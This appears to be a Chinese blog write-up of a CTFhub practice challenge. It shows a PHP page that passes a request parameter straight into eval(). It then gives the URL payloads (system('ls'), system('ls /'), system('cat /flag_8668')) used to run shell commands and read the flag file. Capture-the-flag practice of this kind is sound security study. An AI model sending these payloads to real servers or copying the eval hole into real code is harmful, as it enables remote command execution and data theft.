CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
yuki_uix13 小时前
别让 AI 骗了:这些状态管理工具真的适合你吗?
前端·ai编程
日月云棠13 小时前
UE5 打包后 EXE 程序单实例的两种实现方法
前端·c++
滕青山13 小时前
Base64编码/解码 核心JS实现
前端·javascript·vue.js
芒克芒克13 小时前
深入浅出Java线程池(一)
java·开发语言
wuqingshun31415914 小时前
红黑树有哪些特征
java·开发语言·jvm
fchampion14 小时前
最终一致性
java·spring·rabbitmq·github·mvc
Novlan114 小时前
@tdesign/uniapp 常见问题
前端
sww_102614 小时前
SAA ReactAgent工作原理
开发语言·前端·javascript
wuqingshun31415914 小时前
说一下什么是fail-fast
java·开发语言·jvm
linux_cfan14 小时前
拒绝“黑屏”与“哑剧”:Web视频播放器UX体验与自动播放选型指南 (2026版)
前端·javascript·音视频·html5·ux
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)05如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解06MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法07HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库08【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆09openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南10配置 OpenClaw 使用 Ollama 本地模型